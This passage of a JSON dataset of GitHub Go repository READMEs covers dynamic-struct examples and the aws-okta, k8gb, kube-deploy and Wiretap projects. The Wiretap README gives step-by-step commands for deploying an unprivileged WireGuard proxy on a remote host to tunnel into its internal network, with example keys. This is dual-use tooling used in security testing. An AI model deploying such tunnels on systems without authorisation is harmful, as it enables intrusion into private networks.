`json:\"someText\"`\n\tFloat float64 `json:\"double\"`\n\tBoolean bool\n\tSlice []int\n\tAnonymous string `json:\"-\"`\n}\n\nfunc main() {\n\tdefinition := dynamicstruct.ExtendStruct(Data{}).Build()\n\n\tslice := definition.NewSliceOfStructs()\n\n\tdata := []byte(`\n[\n\t{\n\t\t\"int\": 123,\n\t\t\"someText\": \"example\",\n\t\t\"double\": 123.45,\n\t\t\"Boolean\": true,\n\t\t\"Slice\": [1, 2, 3],\n\t\t\"Anonymous\": \"avoid to read\"\n\t}\n]\n`)\n\n\terr := json.Unmarshal(data, &slice)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tdata, err = json.Marshal(slice)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tfmt.Println(string(data))\n\t// Out:\n\t// [{\"Boolean\":true,\"Slice\":[1,2,3],\"int\":123,\"someText\":\"example\",\"double\":123.45}]\n\n\treader := dynamicstruct.NewReader(slice)\n\treadersSlice := reader.ToSliceOfReaders()\n\tfor k, v := range readersSlice {\n\t\tvar value Data\n\t\terr := v.ToStruct(&value)\n\t\tif err != nil {\n\t\t\tlog.Fatal(err)\n\t\t}\n\n\t\tfmt.Println(k, value)\n\t}\n\t// Out:\n\t// 0 {123 example 123.45 true [1 2 3] }\n}\n\n```\n\n## Make a map of dynamic struct\n\n```go\npackage main\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"log\"\n\n\t\"github.com/ompluscator/dynamic-struct\"\n)\n\ntype Data struct {\n\tInteger int `json:\"int\"`\n\tText string `json:\"someText\"`\n\tFloat float64 `json:\"double\"`\n\tBoolean bool\n\tSlice []int\n\tAnonymous string `json:\"-\"`\n}\n\nfunc main() {\n\tdefinition := dynamicstruct.ExtendStruct(Data{}).Build()\n\n\tmapWithStringKey := definition.NewMapOfStructs(\"\")\n\n\tdata := []byte(`\n{\n\t\"element\": {\n\t\t\"int\": 123,\n\t\t\"someText\": \"example\",\n\t\t\"double\": 123.45,\n\t\t\"Boolean\": true,\n\t\t\"Slice\": [1, 2, 3],\n\t\t\"Anonymous\": \"avoid to read\"\n\t}\n}\n`)\n\n\terr := json.Unmarshal(data, &mapWithStringKey)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tdata, err = json.Marshal(mapWithStringKey)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tfmt.Println(string(data))\n\t// Out:\n\t// {\"element\":{\"int\":123,\"someText\":\"example\",\"double\":123.45,\"Boolean\":true,\"Slice\":[1,2,3]}}\n\n\treader := dynamicstruct.NewReader(mapWithStringKey)\n\treadersMap := reader.ToMapReaderOfReaders()\n\tfor k, v := range readersMap {\n\t\tvar value Data\n\t\terr := v.ToStruct(&value)\n\t\tif err != nil {\n\t\t\tlog.Fatal(err)\n\t\t}\n\n\t\tfmt.Println(k, value)\n\t}\n\t// Out:\n\t// element {123 example 123.45 true [1 2 3] }\n}\n\n```", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "segmentio/aws-okta", "link": "https://github.com/segmentio/aws-okta", "tags": [], "stars": 538, "description": "aws-vault like tool for Okta authentication", "lang": "Go", "repo_lang": "", "readme": "# aws-okta\n\n`aws-okta` allows you to authenticate with AWS using your Okta credentials.\n\n\u26a0\ufe0f As per [#278](https://github.com/segmentio/aws-okta/issues/278), development and maintenance of `aws-okta` is halted. If you're not already using it, now would be a bad time to start. 
\u26a0\ufe0f\n\n## Installing\n\n[See the wiki for more installation options.](https://github.com/segmentio/aws-okta/wiki/Installation)\n\n### MacOS\n\nYou can install with `brew`:\n\n```bash\n$ brew install aws-okta\n```\n\nShout-out to the fine maintainers of [the core formula](https://github.com/Homebrew/homebrew-core/blob/master/Formula/aws-okta.rb).\n\n### Linux\n\n[Download a binary from our release page](https://github.com/segmentio/aws-okta/releases), or [see the wiki for more installation options like deb/rpm packages](https://github.com/segmentio/aws-okta/wiki/Installation).\n\n### Windows\n\nSee [docs/windows.md](docs/windows.md) for information on getting this working with Windows.\n\n## Usage\n\n### Adding Okta credentials\n\n```bash\n$ aws-okta add\n```\n\nThis will prompt you for your Okta organization, custom domain, region, username, and password. These credentials will then be stored in your keyring for future use.\n\n### Exec\n\n```bash\n$ aws-okta exec -- \n```\n\nExec will assume the role specified by the given aws config profile and execute a command with the proper environment variables set. This command is a drop-in replacement for `aws-vault exec` and accepts all of the same command line flags:\n\n```bash\n$ aws-okta help exec\nexec will run the command specified with aws credentials set in the environment\n\nUsage:\n aws-okta exec -- \n\nFlags:\n -a, --assume-role-ttl duration Expiration time for assumed role (default 1h0m0s)\n -h, --help help for exec\n -t, --session-ttl duration Expiration time for okta role session (default 1h0m0s)\n\nGlobal Flags:\n -b, --backend string Secret backend to use [kwallet secret-service file] (default \"file\")\n -d, --debug Enable debug logging\n```\n\n### Exec for EKS and Kubernetes\n\n`aws-okta` can also be used to authenticate `kubectl` to your AWS EKS cluster. Assuming you have [installed `kubectl`](https://docs.aws.amazon.com/eks/latest/userguide/install-kubectl.html), [setup your kubeconfig](https://docs.aws.amazon.com/eks/latest/userguide/create-kubeconfig.html) and [installed `aws-iam-authenticator`](https://docs.aws.amazon.com/eks/latest/userguide/configure-kubectl.html), you can now access your EKS cluster with `kubectl`. Note that on a new cluster, your Okta CLI user needs to be using the same assumed role as the one who created the cluster. Otherwise, your cluster needs to have been configured to allow your assumed role.\n\n```bash\n$ aws-okta exec -- kubectl version --short\n```\n\nLikewise, most Kubernetes projects should work, like Helm and Ark.\n\n```bash\n$ aws-okta exec -- helm version --short\n```\n\n### Configuring your aws config\n\n`aws-okta` assumes that your base role is one that has been configured for Okta's SAML integration by your Okta admin. Okta provides a guide for setting up that integration [here](https://support.okta.com/help/servlet/fileField?retURL=%2Fhelp%2Farticles%2FKnowledge_Article%2FAmazon-Web-Services-and-Okta-Integration-Guide&entityId=ka0F0000000MeyyIAC&field=File_Attachment__Body__s). During that configuration, your admin should be able to grab the AWS App Embed URL from the General tab of the AWS application in your Okta org. You will need to set that value in your `~/.aws/config` file, for example:\n\n```ini\n[okta]\naws_saml_url = home/amazon_aws/0ac4qfegf372HSvKF6a3/965\n```\n\nNext, you need to set up your base Okta role. This will be one your admin created while setting up the integration. 
It should be specified like any other aws profile:\n\n```ini\n[profile okta-dev]\nrole_arn = arn:aws:iam:::role/\nregion = \n```\n\nYour setup may require additional roles to be configured if your admin has set up a more complicated role scheme like cross account roles. For more details on the authentication process, see the internals section.\n\n#### A more complex example\n\nThe `aws_saml_url` can be set in the \"okta\" ini section, or on a per profile basis. This is useful if, for example, your organization has several Okta Apps (i.e. one for dev/qa and one for prod, or one for internal use and one for integrations with third party providers). For example:\n\n```ini\n[okta]\n# This is the \"default\" Okta App\naws_saml_url = home/amazon_aws/cuZGoka9dAIFcyG0UllG/214\n\n[profile dev]\n# This profile uses the default Okta app\nrole_arn = arn:aws:iam:::role/\n\n[profile integrations-auth]\n# This is a distinct Okta App\naws_saml_url = home/amazon_aws/woezQTbGWUaLSrYDvINU/214\nrole_arn = arn:aws:iam:::role/\n\n[profile vendor]\n# This profile uses the \"integrations-auth\" Okta app combined with secondary role assumption\nsource_profile = integrations-auth\nrole_arn = arn:aws:iam:::role/\n\n[profile testaccount]\n# This stores the Okta session in a separate item in the Keyring.\n# This is useful if the Okta session is used or modified by other applications\n# and needs to be isolated from other sessions. It is also useful for\n# development versions or multiple versions of aws-okta running.\nokta_session_cookie_key = okta-session-cookie-test\nrole_arn = arn:aws:iam:::role/\n```\n\nThe configuration above means that you can use multiple Okta Apps at the same time and switch between them easily.\n\n#### Multiple Okta accounts\nsetup accounts:\n```ini\naws-okta add --account=account-a\naws-okta add --account=account-b\n```\n\ndefine keyring key for each profile:\n```ini\n[profile account-a]\n# This is a distinct Okta App\naws_saml_url = home/amazon_aws/woezQTbGWUaLSrYDvINU/214\nrole_arn = arn:aws:iam:::role/\nokta_account_name = account-a\n\n[profile account-b]\naws_saml_url = home/amazon_aws/woezQTbGaDAA4rYDvINU/123\nrole_arn = arn:aws:iam:::role/\nokta_account_name = account-b\n```\n\n#### Configuring Okta assume role and AWS assume role TTLs\n\nThe default TTLs for both the initial SAML assumed role and secondary AWS assumed roles are 1 hour. This means that AWS credentials will expire every hour.\n\n* *session-ttl*: Duration of initial role assumed by Okta\n* *assume-role-ttl*: Duration of second role assumed\n\nIn addition to specifying session and AWS assume role TTLs with command-line flags, they can be set using environment variables.\n\n```bash\nexport AWS_SESSION_TTL=1h\nexport AWS_ASSUME_ROLE_TTL=1h\n```\n\nThe AWS assume role TTL can also be set per-profile in the aws config:\n\n```ini\n# Example with an initial and secondary role that are configured with a max session duration of 12 hours\n[profile ttldemo]\naws_saml_url = home/amazon_aws/cuZGoka9dAIFcyG0UllG/214\nrole_arn = arn:aws:iam:::role/\nsession_ttl = 12h\n\n[profile ttldemo-role]\nsource_profile = ttldemo\nrole_arn = arn:aws:iam:::role/\nassume_role_ttl = 12h\n```\n\n#### Multi-factor Authentication (MFA) configuration\n\nIf you have a single MFA factor configured, that factor will be automatically selected. By default, if you have multiple available MFA factors, then you will be prompted to select which one to use. 
However, if you have multiple factors and want to specify which factor to use, you can do one of the following:\n\n* Specify on the command line with `--mfa-provider` and `--mfa-factor-type`\n* Specify with environment variables `AWS_OKTA_MFA_PROVIDER` and `AWS_OKTA_MFA_FACTOR_TYPE`\n* Specify in your aws config with `mfa_provider` and `mfa_factor_type`\n\n### Shell completion\n\n`aws-okta` provides shell completion support for BASH and ZSH via the `aws-okta completion` command.\n\n## Backends\n\nWe use 99design's keyring package that they use in `aws-vault`. Because of this, you can choose between different pluggable secret storage backends just like in `aws-vault`. You can either set your backend from the command line as a flag, or set the `AWS_OKTA_BACKEND` environment variable.\n\nFor Linux / Ubuntu add the following to your bash config / zshrc etc:\n```\nexport AWS_OKTA_BACKEND=secret-service\n```\n\n## --session-cache-single-item aka AWS_OKTA_SESSION_CACHE_SINGLE_ITEM (alpha)\n\nThis flag enables a new secure session cache that stores all sessions in the same keyring item. For macOS users, this means drastically fewer authorization prompts when upgrading or running local builds.\n\nNo provision is made to migrate sessions between session caches.\n\nImplemented in [https://github.com/segmentio/aws-okta/issues/146](#146).\n\n## Local Development\n\nIf you're developing in Linux, you'll need to get `libusb`. For Ubuntu, install the libusb-1.0-0-dev or use the `Dockerfile` provided in the repo.\n\n## Running Tests\n\n`make test`\n\n## Releasing\n\nPushing a new tag will cause Circle to automatically create and push a linux release. After this is done, you should run (from a mac):\n\n```bash\n$ export CIRCLE_TAG=`git describe --tags`\n$ make release-mac\n```\n\n## Analytics\n\n`aws-okta` includes some usage analytics code which Segment uses internally for tracking usage of internal tools. This analytics code is turned off by default, and can only be enabled via a linker flag at build time, which we do not set for public github releases.\n\n## Internals\n\n### Authentication process\n\nWe use the following multiple step authentication:\n\n- Step 1 : Basic authentication against Okta\n- Step 2 : MFA challenge if required\n- Step 3 : Get AWS SAML assertion from Okta\n- Step 4 : Assume base okta role from profile with the SAML Assertion\n- Step 5 : Assume the requested AWS Role from the targeted AWS account to generate STS credentials\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "k8gb-io/k8gb", "link": "https://github.com/k8gb-io/k8gb", "tags": ["gslb", "kubernetes-operator", "k8s", "cloud-native", "balancer", "kubernetes-global-balancer", "kubernetes-services", "dns-lb", "dns-lb-service", "kubernetes", "kubernetes-controller", "hacktoberfest", "cncf"], "stars": 538, "description": "A cloud native Kubernetes Global Balancer", "lang": "Go", "repo_lang": "", "readme": "

\n\n

\n

# K8GB - Kubernetes Global Balancer\n\nCNCF Sandbox Project | Roadmap | Join #k8gb on CNCF Slack

\n\n[![License: MIT](https://img.shields.io/badge/License-Apache_2.0-yellow.svg)](https://opensource.org/licenses/Apache-2.0)\n[![Build Status](https://github.com/k8gb-io/k8gb/workflows/Golang%20lint,%20golic,%20gokart%20and%20test/badge.svg?branch=master)](https://github.com/k8gb-io/k8gb/actions?query=workflow%3A%22Golang%20lint,%20golic,%20gokart%20and%20test%22+branch%3Amaster)\n[![Terratest Status](https://github.com/k8gb-io/k8gb/workflows/Terratest/badge.svg?branch=master)](https://github.com/k8gb-io/k8gb/actions?query=workflow%3ATerratest+branch%3Amaster)\n[![Gosec](https://github.com/k8gb-io/k8gb/workflows/Gosec/badge.svg?branch=master)](https://github.com/k8gb-io/k8gb/actions?query=workflow%3AGosec+branch%3Amaster)\n[![CodeQL](https://github.com/k8gb-io/k8gb/workflows/CodeQL/badge.svg?branch=master)](https://github.com/k8gb-io/k8gb/actions?query=workflow%3ACodeQL+branch%3Amaster)\n[![Go Report Card](https://goreportcard.com/badge/github.com/k8gb-io/k8gb)](https://goreportcard.com/report/github.com/k8gb-io/k8gb)\n[![Helm Publish](https://github.com/k8gb-io/k8gb/actions/workflows/helm_publish.yaml/badge.svg)](https://github.com/k8gb-io/k8gb/actions/workflows/helm_publish.yaml)\n[![KubeLinter](https://github.com/k8gb-io/k8gb/workflows/KubeLinter/badge.svg?branch=master)](https://github.com/k8gb-io/k8gb/actions?query=workflow%3AKubeLinter+branch%3Amaster)\n[![Docker Pulls](https://img.shields.io/docker/pulls/absaoss/k8gb)](https://hub.docker.com/r/absaoss/k8gb)\n[![Artifact HUB](https://img.shields.io/endpoint?url=https://artifacthub.io/badge/repository/k8gb)](https://artifacthub.io/packages/search?repo=k8gb)\n[![doc.crds.dev](https://img.shields.io/badge/doc-crds-purple)](https://doc.crds.dev/github.com/k8gb-io/k8gb)\n[![FOSSA Status](https://app.fossa.com/api/projects/custom%2B162%2Fgithub.com%2Fk8gb-io%2Fk8gb.svg?type=shield)](https://app.fossa.com/projects/custom%2B162%2Fgithub.com%2Fk8gb-io%2Fk8gb?ref=badge_shield)\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/4866/badge)](https://bestpractices.coreinfrastructure.org/projects/4866)\n[![CLOMonitor](https://img.shields.io/endpoint?url=https://clomonitor.io/api/projects/cncf/k8gb/badge)](https://clomonitor.io/projects/cncf/k8gb)\n\nA Global Service Load Balancing solution with a focus on having cloud native qualities and work natively in a Kubernetes context.\n\nJust a single Gslb CRD to enable the Global Load Balancing:\n\n```yaml\napiVersion: k8gb.absa.oss/v1beta1\nkind: Gslb\nmetadata:\n name: test-gslb-failover\n namespace: test-gslb\nspec:\n ingress:\n ingressClassName: nginx # or any other existing ingressclasses.networking.k8s.io\n rules:\n - host: failover.test.k8gb.io # Desired GSLB enabled FQDN\n http:\n paths:\n - path: /\n pathType: Prefix\n backend:\n service:\n name: frontend-podinfo # Service name to enable GSLB for\n port:\n name: http\n strategy:\n type: failover # Global load balancing strategy\n primaryGeoTag: eu-west-1 # Primary cluster geo tag\n```\n\n[Global load balancing](https://cloud.redhat.com/blog/global-load-balancer-approaches), commonly referred to as GSLB (Global Server Load Balancing) solutions, has been typically the domain of proprietary network software and hardware vendors and installed and managed by siloed network teams.\n\nk8gb is a completely open source, cloud native, global load balancing solution for Kubernetes.\n\nk8gb focuses on load balancing traffic across geographically dispersed Kubernetes clusters using multiple load balancing 
[strategies](./docs/strategy.md) to meet requirements such as region failover for high availability.\n\nGlobal load balancing for any Kubernetes Service can now be enabled and managed by any operations or development teams in the same Kubernetes native way as any other custom resource.\n\n## Key Differentiators\n\n* Load balancing is based on timeproof DNS protocol which is perfect for global scope and extremely reliable\n* No dedicated management cluster and no single point of failure\n* Kubernetes native application health checks utilizing status of Liveness and Readiness probes for load balancing decisions\n* Configuration with a single Kubernetes CRD of Gslb kind\n\n## Quick Start\n\nSimply run\n\n```sh\nmake deploy-full-local-setup\n```\n\nIt will deploy two local [k3s](https://k3s.io/) clusters via [k3d](https://k3d.io/), [expose associated CoreDNS service for UDP DNS traffic](./docs/exposing_dns.md)), and install k8gb with test applications and two sample Gslb resources on top.\n\nThis setup is adapted for local scenarios and works without external DNS provider dependency.\n\nConsult with [local playground](/docs/local.md) documentation to learn all the details of experimenting with local setup.\n\nOptionally, you can run `make deploy-prometheus` and check the metrics on the test clusters (http://localhost:9080, http://localhost:9081).\n\n## Motivation and Architecture\n\nk8gb was born out of the need for an open source, cloud native GSLB solution at Absa Group in South Africa.\n\nAs part of the bank's wider container adoption running multiple, geographically dispersed Kubernetes clusters, the need for a global load balancer that was driven from the health of Kubernetes Services was required and for which there did not seem to be an existing solution.\n\nYes, there are proprietary network software and hardware vendors with GSLB solutions and products, however, these were costly, heavyweight in terms of complexity and adoption, and were not Kubernetes native in most cases, requiring dedicated hardware or software to be run outside of Kubernetes.\n\nThis was the problem we set out to solve with k8gb.\n\nBorn as a completely open source project and following the popular Kubernetes operator pattern, k8gb can be installed in a Kubernetes cluster and via a Gslb custom resource, can provide independent GSLB capability to any Ingress or Service in the cluster, without the need for handoffs and coordination between dedicated network teams.\n\nk8gb commoditizes GSLB for Kubernetes, putting teams in complete control of exposing Services across geographically dispersed Kubernetes clusters across public and private clouds.\n\nk8gb requires no specialized software or hardware, relying completely on other OSS/CNCF projects, has no single point of failure, and fits in with any existing Kubernetes deployment workflow (e.g. GitOps, Kustomize, Helm, etc.) 
or tools.\n\nPlease see the extended architecture documentation [here](/docs/index.md)\n\nInternal k8gb architecture and its components are described [here](/docs/components.md)\n\n## Installation and Configuration Tutorials\n\n* [General deployment with Infoblox integration](/docs/deploy_infoblox.md)\n* [AWS based deployment with Route53 integration](/docs/deploy_route53.md)\n* [AWS based deployment with NS1 integration](/docs/deploy_ns1.md)\n* [Local playground for testing and development](/docs/local.md)\n* [Local playground with Kuar web app](/docs/local-kuar.md)\n* [Metrics](/docs/metrics.md)\n* [Traces](/docs/traces.md)\n* [Ingress annotations](/docs/ingress_annotations.md)\n* [Integration with Admiralty](/docs/admiralty.md)\n* [Integration with Liqo](/docs/liqo.md)\n\n## Production Readiness\n\nk8gb is very well tested with the following environment options\n\n| Type | Implementation |\n|----------------------------------|------------------------------------------------------------------------------|\n| Kubernetes Version | for k8s `< 1.19` use k8gb `<= 0.8.8`; since k8s `1.19` use `0.9.0` or newer |\n| Environment | Self-managed, AWS(EKS) [*](#clarify) |\n| Ingress Controller | NGINX, AWS Load Balancer Controller [*](#clarify) |\n| EdgeDNS | Infoblox, Route53, NS1 |\n\n* We only mention solutions where we have tested and verified a k8gb installation.\nIf your Kubernetes version or Ingress controller is not included in the table above, it does not mean that k8gb will not work for you. k8gb is architected to run on top of any compliant Kubernetes cluster and Ingress controller.\n\n## Presentations Featuring k8gb\n\n[//]: # (Table is generated with the help of https://www.tablesgenerator.com/markdown_tables#)\n\n| **KubeCon NA 2021**
[![](https://img.youtube.com/vi/-lkKZRdv81A/0.jpg)](https://www.youtube.com/watch?v=-lkKZRdv81A \"KubeCon NA 2021: Cloud Native Global Load Balancer for Kubernetes\") | **FOSDEM 2022**
[![](https://img.youtube.com/vi/1UTWxf7PQis/0.jpg)](https://www.youtube.com/watch?v=1UTWxf7PQis \"FOSDEM 2022: Cloud Native Global Load Balancer for Kubernetes\") |\n|---|---|\n| **NS1 INS1GHTS**
[![](https://img.youtube.com/vi/T_4EiAqwevI/0.jpg)](https://www.youtube.com/watch?v=T_4EiAqwevI \"INS1GHTS: Cloud Native Global Load Balancer for Kubernetes\") | **Crossplane Community Day**
[![](https://img.youtube.com/vi/5l4Xf_Q8ybY/0.jpg)](https://www.youtube.com/watch?v=5l4Xf_Q8ybY \"Crossplane Community Day Europe: Scaling Kubernetes Global Balancer with Crossplane\") |\n| **#29 DoK Community**
[![](https://img.youtube.com/vi/MluFlwPFZws/hqdefault.jpg)](https://www.youtube.com/watch?v=MluFlwPFZws \"#29 DoK Community: How Absa Developed Cloud Native Global Load Balancer for Kubernetes\") | **AWS Containers from the Couch show**
[![](https://img.youtube.com/vi/5pe3ezSnVI8/hqdefault.jpg)](https://www.youtube.com/watch?v=5pe3ezSnVI8 \"AWS Containers from the Couch\") |\n| **OpenShift Commons Briefings**
[![](https://img.youtube.com/vi/5DhO9C2NCrk/0.jpg)](https://www.youtube.com/watch?v=5DhO9C2NCrk \"OpenShift Commons Briefings\") | **Demo at Kubernetes SIG Multicluster**
[![](https://img.youtube.com/vi/jeUeRQM-ZyM/0.jpg)](https://www.youtube.com/watch?v=jeUeRQM-ZyM \"Kubernetes SIG Multicluster\") |\n\nYou can also find recordings from our community meetings at [k8gb youtube channel](https://www.youtube.com/channel/UCwvtktvdZu_pg-t-INvuW5g).\n\n## Contributing\n\nSee [CONTRIBUTING](/CONTRIBUTING.md)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kubernetes-retired/kube-deploy", "link": "https://github.com/kubernetes-retired/kube-deploy", "tags": ["k8s-sig-cluster-lifecycle"], "stars": 538, "description": "[EOL] A place for cluster deployment automation", "lang": "Go", "repo_lang": "", "readme": "# kube-deploy\n\nThis is a repository of community maintained Kubernetes cluster deployment\nautomations.\n\nThink of this as https://github.com/kubernetes/contrib for deployment\nautomations! Each subdirectory is its own project. It should be a place where\npeople can come see how the community is deploying kubernetes and should allow\nfor faster development iteration compared to developing in the main repository.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sandialabs/wiretap", "link": "https://github.com/sandialabs/wiretap", "tags": ["golang", "infosec", "proxy", "snl-cyber-sec", "tunnel", "vpn", "wireguard"], "stars": 538, "description": "Wiretap is a transparent, VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.", "lang": "Go", "repo_lang": "", "readme": "
\n\n# Wiretap\n\nWiretap is a transparent, VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.\n
\n\nIn this diagram, the client has generated and installed a WireGuard configuration file that will route traffic destined for `10.0.0.0/24` through a WireGuard interface. Wiretap is then deployed to the server with a configuration that connects to the client as a WireGuard peer. The client can then interact with resources local to the server as if on the same network. \n\n
\n\n![Wiretap Diagram](media/Wiretap_Animated.svg)\n
\n\n## Quick Start\n\n1. Download binaries from the [releases](https://github.com/sandialabs/wiretap/releases) page, one for your client machine and one for your server (if different os/arch)\n2. Run `./wiretap configure --port --endpoint --routes ` with the appropriate arguments\n3. Import the resulting `wiretap.conf` file into WireGuard on the client machine\n4. Copy and paste the arguments output from the configure command into Wiretap on the server machine\n\n## Requirements\n\n### Client System\n\n* WireGuard - https://www.wireguard.com/install/\n* Privileged access to configure WireGuard\n\n### Server System\n\n* UDP access to client system's WireGuard endpoint (i.e., UDP traffic can be sent out and come back on at least one port)\n\nWhile not ideal, Wiretap can still work with outbound TCP instead of UDP. See the [TCP Tunneling](#tcp-tunneling) section for a step-by-step guide. \n\n## Installation\n\nGrab a binary from the [releases](https://github.com/sandialabs/wiretap/releases) page. You may want two binaries if the OS/ARCH are different on the client and server machines.\n\nIf you want to compile it yourself or can't find the OS/ARCH you're looking for, install Go (>=1.19) from https://go.dev/dl/ and use the provided [Makefile](./src/Makefile).\n\n## Usage\n\n### Configure\n\n
\n\n![Wiretap Configure Arguments](media/Wiretap_Configure.svg)\n
\n\nOn the client machine, run Wiretap in configure mode to build a config\n\n```bash\n./wiretap configure --port --endpoint --routes \n```\n\nFollowing the example in the diagram:\n```bash\n./wiretap configure --port 1337 --endpoint 1.3.3.7:1337 --routes 10.0.0.0/24\n```\n```\n\nConfiguration successfully generated.\nImport the config into WireGuard locally and pass the arguments below to Wiretap on the remote machine.\n\nconfig: wiretap.conf\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n[Interface]\nPrivateKey = qCvx4DBXqemoO8B7eRI2H9Em8zJn++rIBKO+F+ufQWE=\nAddress = 192.168.0.2/32\nAddress = fd::2/128\nListenPort = 1337\n\n[Peer]\nPublicKey = 6NxBlwJHujEFr5n9qvFAUyinj0l7Wadd/ZDQMCqTJAA=\nAllowedIPs = 10.0.0.0/24,a::/128\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\nargs: serve --private qGrU0juci5PLJ1ydSufE/UwlErL/bqfcz6uWil705UU= --public ZhRIAcGVwT7l9dhEXv7cvYKwLxOZJR4bgU4zePZaT04= --endpoint 1.3.3.7:1337\n\n```\n\nInstall the resulting config either by copying and pasting the output or by importing the new `wiretap.conf` file into WireGuard:\n\n* If using a GUI, select the menu option similar to *Import Tunnel(s) From File*\n* If you have `wg-quick` installed, `sudo wg-quick up ./wiretap.conf`\n\nDon't forget to disable or remove the tunnel when you're done (e.g., `sudo wg-quick down ./wiretap.conf`)\n\n### Deploy\n\nOn the remote machine, upload the binary and then copy the command with the private and public keys to start Wiretap in server mode:\n```\n.\\wiretap.exe serve --private qGrU0juci5PLJ1ydSufE/UwlErL/bqfcz6uWil705UU= --public ZhRIAcGVwT7l9dhEXv7cvYKwLxOZJR4bgU4zePZaT04= --endpoint 1.3.3.7:1337\n```\n\nConfirm that the client and server have successfully completed the handshake. The client should see a successful handshake in whatever WireGuard interface is running. If using the command-line tools, check with `wg show`.\n\n### Add Peers (optional)\n\n
\n\n![Wiretap Add Arguments](media/Wiretap_Add.svg)\n
\n\nYou can create new configurations after deployment for sharing access to the target network with others.\n\nTo test access to the Wiretap API running on the server, run:\n\n```bash\n./wiretap ping\n```\n```\nresponse: pong\n from: a::\n time: 2.685600 milliseconds\n```\n\nA successful `pong` message indicates that the API is responsive and commands like `add` will now work.\n\nAdding a peer is very similar to configuring Wiretap initially. It will generate a configuration file you can share, but it will not output arguments that need to be passed to the server because that information is passed via the API. If you're generating a configuration for someone else, get their address information for the endpoint and port flags.\n\n```bash\n./wiretap add --port 1337 --endpoint 1.3.3.8:1337 --routes 10.0.0.0/24\n```\n```\n\nConfiguration successfully generated and pushed to server.\nImport this config locally or send it to a friend.\n\nconfig: wiretap_1.conf\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n[Interface]\nPrivateKey = UJsLCSTg6xqfrKJtXQioaek/mCj4gzOdUIrp/+NkJ3Q=\nAddress = 192.168.0.3/32\nAddress = fd::3/128\nListenPort = 1337\n\n[Peer]\nPublicKey = 7mVguCBt7qxMsjDHR7WzzzNXbyBi5Q35gMvyUxjWMWc=\nAllowedIPs = 10.0.0.0/24,a::/128\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\n```\n\nAt this point, the server will attempt to reach out to the provided endpoint. Share the config file and have the recipient import it into WireGuard for Wiretap to connect.\n\n> **Note**\n> To add another peer on the same machine, you will need to specify an unused port, unused routes, and disable the API route.\n\n## Help\n\n```bash\n./wiretap --help --show-hidden\n```\n```\nUsage:\n wiretap [flags]\n wiretap [command]\n\nAvailable Commands:\n add Add peer to wiretap\n configure Build wireguard config\n help Help about any command\n ping Ping wiretap server API\n serve Listen and proxy traffic into target network\n\nFlags:\n -h, --help help for wiretap\n --show-hidden show hidden flag options\n -v, --version version for wiretap\n\nUse \"wiretap [command] --help\" for more information about a command.\n```\n\n## Features\n\n* Network\n - IPv4\n - IPv6\n - ICMPv4: Echo requests and replies\n - ICMPv6: Echo requests and replies\n* Transport\n - TCP\n - Transparent connections\n - RST response when port is unreachable\n - UDP\n - Transparent \"connections\"\n - ICMP Destination Unreachable when port is unreachable\n* API\n - API internal to Wiretap for dynamic configuration\n - Add peers after deployment for multi-user support\n\n## Demo\n\nThe demo has three hosts and two networks:\n\n```\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u2502 client \u2502\n\u2502 \u2502\n\u2502 10.1.0.2 \u2502\n\u2502 fd:1::2 \u251c\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2502 exposed network \u2502\n\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2502 10.1.0.0/16,fd:1::/64 \u2502\n\u2502 10.1.0.3 
